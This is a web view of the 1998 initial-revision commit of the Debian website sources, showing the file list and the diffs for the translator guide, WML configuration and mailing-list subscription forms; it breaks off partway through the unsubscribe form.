diff options
| author | James A. Treacy <treacy> | 1998-07-01 06:32:18 +0000 |
|---|---|---|
| committer | James A. Treacy <treacy> | 1998-07-01 06:32:18 +0000 |
| commit | 557f8619f4cd8b7c9b5396856c78d65e0b1aaf65 (patch) | |
| tree | 681ec8df6e62463c95a70c788353ce118fcffd07 | |
Initial revision
CVS version numbers
TRANSLATING.pages: INITIAL -> 1.1
changes: INITIAL -> 1.1
new_translation.pl: INITIAL -> 1.1
english/.wmkrc: INITIAL -> 1.1
english/.wmlrc: INITIAL -> 1.1
english/Makefile: INITIAL -> 1.1
english/contact.wml: INITIAL -> 1.1
english/developers_corner.wml: INITIAL -> 1.1
english/donations.wml: INITIAL -> 1.1
english/index.wml: INITIAL -> 1.1
english/license.wml: INITIAL -> 1.1
english/news.wml: INITIAL -> 1.1
english/news1997.wml: INITIAL -> 1.1
english/related_links.wml: INITIAL -> 1.1
english/social_contract.wml: INITIAL -> 1.1
english/support.wml: INITIAL -> 1.1
english/MailingLists/subscribe.wml: INITIAL -> 1.1
english/MailingLists/unsubscribe.wml: INITIAL -> 1.1
english/devel/extract_key.wml: INITIAL -> 1.1
english/devel/help.wml: INITIAL -> 1.1
english/devel/incoming_mirrors.wml: INITIAL -> 1.1
english/devel/maintainer_contacts.wml: INITIAL -> 1.1
english/devel/mirror.wml: INITIAL -> 1.1
english/devel/people.names: INITIAL -> 1.1
english/devel/people.wml: INITIAL -> 1.1
english/devel/ports.wml: INITIAL -> 1.1
english/devel/release_info.wml: INITIAL -> 1.1
english/devel/rsync_examples.wml: INITIAL -> 1.1
english/distrib/distrib.wml: INITIAL -> 1.1
english/distrib/ftplist.wml: INITIAL -> 1.1
english/distrib/packages.wml: INITIAL -> 1.1
english/distrib/vendors.wml: INITIAL -> 1.1
english/doc/index.wml: INITIAL -> 1.1
english/intro/about.wml: INITIAL -> 1.1
english/intro/businesses.wml.wrk: INITIAL -> 1.1
english/intro/cn.wml: INITIAL -> 1.1
english/intro/cooperation.wml: INITIAL -> 1.1
english/intro/free.wml: INITIAL -> 1.1
english/intro/international.wml: INITIAL -> 1.1
english/intro/license_disc.wml: INITIAL -> 1.1
english/intro/why_debian.wml: INITIAL -> 1.1
english/logos/index.wml: INITIAL -> 1.1
english/security/amd.html: INITIAL -> 1.1
english/security/bind.html: INITIAL -> 1.1
english/security/bliss.html: INITIAL -> 1.1
english/security/deliver.html: INITIAL -> 1.1
english/security/doom.html: INITIAL -> 1.1
english/security/dwww.html: INITIAL -> 1.1
english/security/elm-me+.html: INITIAL -> 1.1
english/security/gcc.html: INITIAL -> 1.1
english/security/gzip.html: INITIAL -> 1.1
english/security/gzip2.html: INITIAL -> 1.1
english/security/imap4.html: INITIAL -> 1.1
english/security/index.wml: INITIAL -> 1.1
english/security/inetd.html: INITIAL -> 1.1
english/security/irc.html: INITIAL -> 1.1
english/security/kdebase.html: INITIAL -> 1.1
english/security/land.html: INITIAL -> 1.1
english/security/ldso.html: INITIAL -> 1.1
english/security/libdb.html: INITIAL -> 1.1
english/security/lincity.html: INITIAL -> 1.1
english/security/lynx.html: INITIAL -> 1.1
english/security/mailx.html: INITIAL -> 1.1
english/security/mc.html: INITIAL -> 1.1
english/security/metamail.html: INITIAL -> 1.1
english/security/mgetty.html: INITIAL -> 1.1
english/security/minicom.html: INITIAL -> 1.1
english/security/modutils.html: INITIAL -> 1.1
english/security/netstd.html: INITIAL -> 1.1
english/security/nlspath.html: INITIAL -> 1.1
english/security/parsecontrol.html: INITIAL -> 1.1
english/security/perl.html: INITIAL -> 1.1
english/security/php.html: INITIAL -> 1.1
english/security/premail.html: INITIAL -> 1.1
english/security/premail.html.sav: INITIAL -> 1.1
english/security/procps.html: INITIAL -> 1.1
english/security/rlogin.html: INITIAL -> 1.1
english/security/samba.html: INITIAL -> 1.1
english/security/samba2.html: INITIAL -> 1.1
english/security/screen.html: INITIAL -> 1.1
english/security/sendmail.html: INITIAL -> 1.1
english/security/shadow-su.html: INITIAL -> 1.1
english/security/smail.html: INITIAL -> 1.1
english/security/sperl.html: INITIAL -> 1.1
english/security/sperl2.html: INITIAL -> 1.1
english/security/ssh.html: INITIAL -> 1.1
english/security/sudo.html: INITIAL -> 1.1
english/security/super.html: INITIAL -> 1.1
english/security/superprobe.html: INITIAL -> 1.1
english/security/svgalib.html: INITIAL -> 1.1
english/security/talkd.html: INITIAL -> 1.1
english/security/tar.html: INITIAL -> 1.1
english/security/teardrop.html: INITIAL -> 1.1
english/security/template.html: INITIAL -> 1.1
english/security/textutils.html: INITIAL -> 1.1
english/security/tftp.html: INITIAL -> 1.1
english/security/xfree.html: INITIAL -> 1.1
english/security/xfree1.html: INITIAL -> 1.1
english/security/xfree2.html: INITIAL -> 1.1
english/security/xfree3.html: INITIAL -> 1.1
english/security/info/amd-nodev.html: INITIAL -> 1.1
english/security/info/amd-nodev.patch: INITIAL -> 1.1
english/security/info/doom.html: INITIAL -> 1.1
english/security/info/elm-me+.html: INITIAL -> 1.1
english/security/info/imapd.html: INITIAL -> 1.1
english/security/info/inetd-groups.html: INITIAL -> 1.1
english/security/info/metamail.html: INITIAL -> 1.1
english/security/info/metamail.patch: INITIAL -> 1.1
english/security/info/minicom.html: INITIAL -> 1.1
english/security/info/nlspath.c: INITIAL -> 1.1
english/security/info/nlspath.html: INITIAL -> 1.1
english/security/info/php.html: INITIAL -> 1.1
english/security/info/probe.c: INITIAL -> 1.1
english/security/info/rlogin.html: INITIAL -> 1.1
english/security/info/screen.html: INITIAL -> 1.1
english/security/info/sendmail-dead-letter.html: INITIAL -> 1.1
english/security/info/shellcode.s: INITIAL -> 1.1
english/security/info/sperl-5.003.html: INITIAL -> 1.1
english/security/info/sperlexp.tgz: INITIAL -> 1.1
english/security/info/stack.c: INITIAL -> 1.1
english/security/info/superprobe.html: INITIAL -> 1.1
english/security/info/talkd.html: INITIAL -> 1.1
english/security/info/tftpd.html: INITIAL -> 1.1
english/security/info/tftpd.patch: INITIAL -> 1.1
english/security/info/xfree3.html: INITIAL -> 1.1
english/template/debian/basic.wml: INITIAL -> 1.1
english/template/debian/ctime.wml: INITIAL -> 1.1
english/template/debian/footer.wml: INITIAL -> 1.1
english/template/debian/languages.wml: INITIAL -> 1.1
english/template/debian/mainpage.wml: INITIAL -> 1.1
english/template/debian/menubar.wml: INITIAL -> 1.1
english/template/debian/navbar.wml: INITIAL -> 1.1
english/template/debian/recent_news.wml: INITIAL -> 1.1
english/template/debian/template.wml: INITIAL -> 1.1
german/.wmlrc: INITIAL -> 1.1
german/social_contract.wml: INITIAL -> 1.1
136 files changed, 10469 insertions, 0 deletions
diff --git a/TRANSLATING.pages b/TRANSLATING.pages new file mode 100644 index 00000000000..a4ba9983d60 --- /dev/null +++ b/TRANSLATING.pages @@ -0,0 +1,88 @@ +Thanks you for helping to translate the Debian web pages. +Instead of having a number of different sites hosting language +specific versions of the web pages, it is hoped that people +will concentrate on keeping a primary site which will host the +translations of a common set of web pages. + +BACKGROUND +---------- +All the hand written (non documentation) files on the web site are +generated using wml. They are stored on www.debian.org using CVS. +You will want to check out a local copy of the wml files to edit +on your home machine. When you are done making changes, you can then +release the changes back to www.debian.org. Once a day, those +files will be checked out automatically. A Makefile is then run +on them to create the updated web pages. + +USING CVS +--------- +To check out a copy of the wml files on your local machine, you +need to use + cvs checkout +where <lang> is the language you want. You will probably want +the English version in addition to the language you are working on. +When you are done with the page, you can check it back in using + cvs release <file>.wml +If you are the first person translating a page, you need to do + cvs add <file>.wml +before you can release it. +You can release multiple pages or directories at once. Adding -d to +the line will also delete them from your machine: + cvs release -d <list of directories and/or files> + +For more information on CVS, use 'info cvs'. + +TRANSLATING PAGES +----------------- +To make the job of the translators as easy as possible the +master pages are generated a bit differently than many of +you will be used to. The web pages are actually generated +using source that is marked up with wml. There are +seperate directories for each language. To translate to a +new language, someone must first translate the wml template +files (not a big job). + +Because of the way the web servers are set up, you should not +have to change any of the internal links. There are times when +you may want to make a change to the content when you are +translating. One example is on the support page; you will +probably want to include an example on subscribing to the +language specific mailing list, e.g. debian-french on the +French version of the pages. If you make any other changes, +please notify debian-www@lists.debian.org as it is desired to +keep the content as similar as possible between the different +versions. + +The first time a page is translated, send a note to debian-www@lists.debian.org +as a script must be run on the pages to re-make the other language +versions so they will know about the new translation. + +I hope you find the work we've done will make translating +the pages as easy as possible. + +HOW DOES THE SERVER KNOW WHICH FILE TO SERVE +-------------------------------------------- +You will notice that internal links don't end in .html. This +is because the server is using content negotation to decide +which version of the document to deliver. When there is more +than one choice, the server will make a list of all possible +files to serve, e.g. if the request is for about, then the list +of competions might be about.html.en and about.html.de. +The default for Debian servers will be to serve the English +document, but it is configurable. + +If a client has the proper variable set, for example to serve German, +then in the example above about.html.de would be served. The +nice thing about this setup is that if the desired language is +not available, a different language will be delivered instead +(which hopefully is better than nothing). The decision on which +document is served is a bit confusing so instead of describing +it here, you should get the definitive answer from +http://www.apache.org/docs/content-negotiation.html +if you are interested. + +Because many users will not even know of the existence of content-negotation, +there are links at the bottom of every page pointing directly +to the version of that page in every other language available +(this is computed using a perl script called by wml when the +page is generated). diff --git a/changes b/changes new file mode 100644 index 00000000000..e1b7824a655 --- /dev/null +++ b/changes @@ -0,0 +1,38 @@ +I did a bunch of work on the web pages yesterday. You +can find the results on +http://www.debian.org/~treacy/debian.new/html/ +Here's the changes I've made + x I've converted pretty much every page not generated + by a script or in the doc section. + x moved the directories around a bit to make it easier to + add different languages (still need to change the html + directory to debian.org). The template dir will be moved + back into the language dir and an option to wmk will keep + it from converting the templates to html. + x set up the mirror link correctly + x when /index.html is generated, it grabs the titles of the + latest 6 pieces of news. Hopefully I can get index.html to + have a dependency on news.html so 'wmk -a' works correctly. + Dependencies are fixed by using a makefile + x bunch of little fixes people on #debian suggested. + +TODO + x What do you think of the foreign links at the bottom of the + main page? Still need to write the perl script that will check + what versions are available for a page (and generates that line). + I can't think of a way to generate the cross-dependencies needed + so the versions in other languages will be remade when someone adds + a new (language) versions of a file so I'll write a perl script to + do it. It will be the translators duty to run this script when they + translate a page for the first time. + x 'What is Debian' on the main page makes too many references to + 'free software'. It needs to be cleaned up. + - Convert the pages in 'Debian goes International' to this format and + get rid of that page. + - Put the whole thing under CVS. + x Change the filenames to .html.en. Read devel/mirror.html if you need + to turn on content negotiation on your home machine as a result of this. + x get some people to go through the entire site with a fine toothed comb. + Done - I hope. + +Jay Treacy diff --git a/english/.wmkrc b/english/.wmkrc new file mode 100644 index 00000000000..4bb32aa71b6 --- /dev/null +++ b/english/.wmkrc @@ -0,0 +1,10 @@ +-F basic.wml +-F footer.wml +-F languages.wml +-F menubar.wml +-F recent_news.wml +-F ctime.wml +-F footer.wml.orig +-F mainpage.wml +-F navbar.wml +-F template.wml diff --git a/english/.wmlrc b/english/.wmlrc new file mode 100644 index 00000000000..b5a6f8a4f7a --- /dev/null +++ b/english/.wmlrc @@ -0,0 +1,17 @@ +-D WML_SRC_REALNAME="Debian Webmaster" +-D WML_SRC_USERNAME=webmaster +-D WML_GEN_HOSTNAME=debian.org +-D HOME~. +-D CUR_LANG=English +-D INTRO~intro +-D DEVEL~devel +-D DOC~doc +-D DISTRIB~distrib +-D MISC~misc +-D BUGS~Bugs +-D PICS~Pics +-D STYLE~style +-D SPANISH~Spanish +-D ITALIAN~Italian +-D HTMLDIR~../html +-I template diff --git a/english/MailingLists/subscribe.wml b/english/MailingLists/subscribe.wml new file mode 100644 index 00000000000..15c65d9a2e6 --- /dev/null +++ b/english/MailingLists/subscribe.wml @@ -0,0 +1,378 @@ +#!wml -o ../../../debian.org/MailingLists/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Mailing-List Subscription" + +<H1>Mailing-List Subscription</H1> + +Our lists are served by Smartlist. This is a comfortable, easy +way to manage them. If the subscription policy for the +particular list is `open' everyone is able to subscribe/unsubscribe +on their own. + +<P>*NO* subscription or unsubscription messages should be sent to the +lists address. They should only to a special control address which +is slightly different from the lists address. To subscribe or +unsubscribe to such a list, please send a mail to + +<P><listname>-REQUEST@lists.debian.org + +<P>with the word `subscribe' or `unsubscribe' as subject. +Please remember the -REQUEST inside of the name. + +<P>A much easier way is to simply use our subscribe and unsubscribe +forms. The subscription form is below. The unsubscribe form is on a separate page. + +<HR> +<FORM METHOD=POST ACTION="http://cgi.debian.org/cgi-bin/subscribe.pl"> +Please select which lists you want to subscribe to: + +<P>First of all there are several user based mailing lists on which +both developers and users get in contact and discuss and solve +possible problems. Don't be intimidated by the number of lists. +Those below, in the first group, are the only lists that most users will +ever need. + +<DL> +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-user"> + <STRONG>debian-user</STRONG> +<DD>This is the main mailing list for all users and + developers of Debian GNU/Linux systems. Many developers follow + the threads and step in to help answer questions and solve + problems. discussion of Debian.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em><BR> + <INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-user-digest"> + <STRONG>debian-user-digest</STRONG> is a read-only, digestified version + of debian-user. + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-user-de"> + <STRONG>debian-user-de</STRONG> +<DD>This mailing list is the main mailing list for + German speaking users. To subscribe to the list + send "subscribe debian-user-de" to majordomo@jfl.de + To unsubscribe send "unsubscribe debian-user-de"<BR> + Language: <em>German</em>      + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-user-spanish"> + <STRONG>debian-user-spanish</STRONG> +<DD>This list is used to give support for Spanish + speaking users of Debian GNU/Linux.<BR> + Language: <em>Spanish</em>      + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-italian"> + <STRONG>debian-italian</STRONG> +<DD>This list supports native italian speaking users of + Debian GNU/Linux.<BR> + Language: <em>Italian</em>      + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-french"> + <STRONG>debian-french</STRONG> +<DD>Native french speaking users of Debian GNU/Linux + discuss various topics on this list.<BR> + Language: <em>French</em>      + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-changes"> + <STRONG>debian-changes</STRONG> +<DD>Changes to releases are announced here. This includes security + upgrades as well as important bug fixes.<BR> + Moderated: <em>Yes</em>     Subscription: <em>Open</em><BR> + <INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-changes-digest"> + <STRONG>debian-changes-digest</STRONG> is a read-only, digestified version + of debian-changes.<BR> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-announce"> + <STRONG>debian-announce</STRONG> +<DD>This list carries major announcements related to the Debian distribution. <BR> + Moderated: <em>Yes</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-isp"> + <STRONG>debian-isp</STRONG> +<DD>This list discusses ISP specific issues and problems. + An ISP is an Internet Service Provider, or Provider for short.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-cd"> + <STRONG>debian-cd</STRONG> +<DD>This list is used to make announcements to cd vendors.<BR> + Moderated: <em>Yes</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="mirror-list"> + <STRONG>mirror-list</STRONG> +<DD>Important changes of the ftp archive are announced + here to give archive maintainers a chance to take + care of their archives.<BR> + Moderated: <em>Yes</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-security-announce"> + <STRONG>debian-security-announce</STRONG> +<DD>This list is dedicated to the + broadcasting of Debian Security Advisories. The advisories will document + security vulnerabilities in the current versions of Debian and provide + fixes, either as updated Debian packages to fetch and install or as + instructions for working around the security problem. + + <P>The list is low-volume and digital (PGP) signatures are used for + moderation, so subscribing to it will not add a single piece of spam to + your mailbox. We encourage everyone to subscribe.<BR> + Moderated: <em>Yes</em>     Subscription: <em>Open</em> +</DT> + +<P><DT><HR>There are several lists on which developers and experienced +users discuss more technical issues. In addition, there are some +announcement lists so experienced users can keep track of the +development.<DD></DD></DT> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-devel"> + <STRONG>debian-devel</STRONG> +<DD>This is the main discussion list for development + topics. All developers should be subscribed to this + list. As it is open to the public anyone can join + the discussion.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em><BR> + <INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-devel-digest"> + <STRONG>debian-devel-digest</STRONG> is a read-only, digestified version + of debian-devel. + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-devel-changes"> + <STRONG>debian-devel-changes</STRONG> +<DD>Postings about new uploads, processed packages, etc.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-devel-announce"> + <STRONG>debian-devel-announce</STRONG> +<DD>Announcements of development issues like policy + changes, important release issues, etc.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-mentors"> + <STRONG>debian-mentors</STRONG> +<DD>This list is for newbie maintainers who seek help + with initial packaging and other developer-related + issues. Those who prefer one-on-one help should + also post to the list, and an experienced developer + will volunteer.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-68k"> + <STRONG>debian-68k</STRONG> +<DD>Discussions on the m68k port for Debian GNU/Linux.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-sparc"> + <STRONG>debian-sparc</STRONG> +<DD>Discussions on the Sparc port for Debian GNU/Linux.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-powerpc"> + <STRONG>debian-powerpc</STRONG> +<DD>Discussion on the PowerPC port for Debian GNU/Linux.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-alpha"> + <STRONG>debian-alpha</STRONG> +<DD>Discussion on the Alpha port for Debian GNU/Linux.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="win32"> + <STRONG>win32</STRONG> +<DD>This list is about porting the Debian distribution + on Win32 systems... (hence Debian GNU/Win32)<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-i18n"> + <STRONG>debian-i18n</STRONG> +<DD>Internationalization (i18n) of the distribution is + discussed here.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-faq"> + <STRONG>debian-faq</STRONG> +<DD>Various topics concerning the faq are discussed on + this list.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-doc"> + <STRONG>debian-doc</STRONG> +<DD>Documentation of different parts of the system + are addressed on this list.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-l10n-spanish"> + <STRONG>debian-l10n-spanish</STRONG> +<DD>This list is used to discuss localization issues, + mainly about translating Debian docs and programs + to Spanish.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-www"> + <STRONG>debian-www</STRONG> +<DD>The design and ordering of our webpages are + discussed here. If important changes are in + progress they're discussed on this list first<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><HR>In this next group are some specialized lists that cover specific development +issues such as package maintenance, policy issues, quality assurance, +etc.<DD></DD></DT> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-policy"> + <STRONG>debian-policy</STRONG> +<DD>The Debian Policy is the topic for this list. Changes + are discussed here before they are implemented.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-admintool"> + <STRONG>debian-admintool</STRONG> +<DD>Topic for this list is an administration tool for + Debian. This tool should be able to maintain most + of the configuration files that come with the packages.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-autobuild"> + <STRONG>debian-autobuild</STRONG> +<DD>This list is used for discussions on auto-compile + tools and systems that will build the + distribution. Autobuild routines help in porting the + distribution to other architectures.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-dpkg"> + <STRONG>debian-dpkg</STRONG> +<DD>The program dpkg is the main tool for package + maintenance within the distribution. This list + contains discussions about it, especially on + technical topics.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-qa"> + <STRONG>debian-qa</STRONG> +<DD>Quality assurance is important for a distribution. + This list addresses how to maintain that quality.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-publicity"> + <STRONG>debian-publicity</STRONG> +<DD>This list prepares press releases and discusses + them before they get released and translated.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> + +<DT> + <STRONG>debian-private</STRONG> +<DD>This list is for discussions between developers that + aren't appropriate for public consumption. The bulk of + the topics are security related. Most go public (to debian-devel) + within a week.<BR> + Moderated: <em>No</em>     Subscription: <em>Developers + Only</em> + +<DT> + <STRONG>debian-email</STRONG> +<DD>The intention of this list is to act as a center for + Debian-related correspondence such as contacting + upstream authors about licenses, bugs etc. or + discussing the project with others where it might + be useful to have the discussion archived + somewhere.<BR> + Moderated: <em>No</em>     Subscription: <em>Developers + Only</em> + +<DT> + <STRONG>debian-consultants</STRONG> +<DD>This list is intended for consultants of + Debian GNU/Linux to communicate.<BR> + Moderated: <em>No</em>     Subscription: <em>Closed</em> + +<DT> + <STRONG>deity</STRONG> +<DD>Debian GNU/Linux will get a new user frontend to + package maintenance. This is called deity, its + development is discussed here.<BR> + Moderated: <em>No</em>     Subscription: <em>Deity + Developers Only</em><BR> + <INPUT TYPE="checkbox" NAME="subscribe" VALUE="deity-digest"> + <STRONG>deity-digest</STRONG> is a read-only, digestified version + of deity-digest. + +<DT> + <STRONG>debian-testing</STRONG> +<DD>This list discusses changes of the current release.<BR> + Moderated: <em>No</em>     Subscription: <em>Developers + Only</em> + +<DT> + <STRONG>debian-security-private</STRONG> +<DD>This list is connected with the main security lists + for Linux. General security issues for Linux are + discussed on this list.<BR> + Moderated: <em>No</em>     Subscription: <em>Developers + Only</em> + +<DT><HR>The bugtracking system for Debian GNU/Linux is open to the public. It +produces a lot of mail that might be of general interest for some +users or developers. Therefore some forwarding lists were created +to distribute mail from the bugtracking system separate from the other +developer lists.<DD></DD></DT> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-bugs-dist"> + <STRONG>debian-bugs-dist</STRONG> +<DD>All submitted bug reports as well as further + information on them are distributed here.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em><BR> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-bugs-forwarded"> + <STRONG>debian-bugs-forwarded</STRONG> +<DD>The mail that forwards bugs to their upstream + author is distributed via this list.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em><BR> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-bugs-closed"> + <STRONG>debian-bugs-closed</STRONG> +<DD>This list notifies its subscribers about closed bugs.<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em><BR> + +<DT><INPUT TYPE="checkbox" NAME="subscribe" VALUE="debian-bugs-reports"> + <STRONG>debian-bugs-reports</STRONG> +<DD>This lists distribute the weekly bugs reports<BR> + Moderated: <em>No</em>     Subscription: <em>Open</em> +</DL> + +<STRONG>Your E-Mail address:</STRONG> +<BR><INPUT TYPE="text" NAME="user_email" SIZE="60"><BR> +<INPUT TYPE="SUBMIT"> <INPUT TYPE="RESET"> +</FORM> + +<HR> +<H2>Debian Mailing list advertising policy</H2> +<P>This policy is intended to fight mailing-list "spamming". + + +<P>The Debian Linux mailing lists accept commercial advertising for + payment. We offer a fee waiver if you can show us the canceled + check for a $1000 (U.S.) or more donation to the Free Software + Foundation earmarked for "Debian". One donation per advertisement, + please. If you don't wish to donate, simply post your advertisement + to the list, and the operator of the mailing lists will bill you $1999 + (U.S). The list operator will donate this amount, minus the expense + of collecting it, to FSF. Please note that the lists are distributed + automatically - messages are generally not read or checked in any way + before they are distributed. + + +<P>By the act of posting your advertisement you agree to accept + responsibility for the fee, you agree to indemnify the mailing-list + operator against any legal claims from you or others in connection + with your advertisement, and you agree to pay any legal and business + expenses incurred in collecting late payment. Our liability to you + is limited to a good-faith effort to deliver your message. + + +<P>Reduced rates and/or waiver of fee are available for Debian-related + advertisements. You must consult the mailing-list operator in + advance of posting for any reduction or fee waiver. + +<HR> +<P>Back to the <A HREF="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "MailingLists", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/MailingLists/unsubscribe.wml b/english/MailingLists/unsubscribe.wml new file mode 100644 index 00000000000..650623945fb --- /dev/null +++ b/english/MailingLists/unsubscribe.wml @@ -0,0 +1,171 @@ +#!wml -o ../../../debian.org/MailingLists/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Mailing-List Unsubscription" + +<H1>Mailing-List Unsubscription</H1> + +Our lists are served by Smartlist. This results in a comfortable +way for managing them. If the subscription policy for the +particular list is `open' everyone is able to subscribe/unsubscribe +on their own. + +<P>*NO* subscription or unsubscription messages should be sent to the +lists address. They should only to a special control address which +is slightly different from the lists address. To subscribe or +unsubscribe to such a list, please send a mail to + +<P><listname>-REQUEST@lists.debian.org + +<P>with the word `subscribe' or `unsubscribe' as subject. + +<P>Please remember the -REQUEST inside of the name. + +<P>Of course, it is much easier to simply use our automated subscription +and unsubscription form. The unsubscription form is below. + +<HR> +<FORM METHOD=POST ACTION="http://cgi.debian.org/cgi-bin/subscribe.pl"> +Please select which lists you want to unsubscribe to: + +<TABLE> +<TR> +<TD VALIGN="TOP"> + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-user"> + <STRONG>debian-user</STRONG><BR> + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-user-digest"> + <STRONG>debian-user-digest</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-user-de"> + <STRONG>debian-user-de</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-user-spanish"> + <STRONG>debian-user-spanish</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-italian"> + <STRONG>debian-italian</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-french"> + <STRONG>debian-french</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-changes"> + <STRONG>debian-changes</STRONG><BR> + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-changes-digest"> + <STRONG>debian-changes-digest</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-announce"> + <STRONG>debian-announce</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-isp"> + <STRONG>debian-isp</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-cd"> + <STRONG>debian-cd</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="mirror-list"> + <STRONG>mirror-list</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-devel"> + <STRONG>debian-devel</STRONG><BR> +<TD VALIGN="TOP"> + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-devel-digest"> + <STRONG>debian-devel-digest</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-devel-changes"> + <STRONG>debian-devel-changes</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-devel-announce"> + <STRONG>debian-devel-announce</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-mentors"> + <STRONG>debian-mentors</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-68k"> + <STRONG>debian-68k</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-sparc"> + <STRONG>debian-sparc</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-powerpc"> + <STRONG>debian-powerpc</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-alpha"> + <STRONG>debian-alpha</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="win32"> + <STRONG>win32</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-i18n"> + <STRONG>debian-i18n</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-faq"> + <STRONG>debian-faq</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-doc"> + 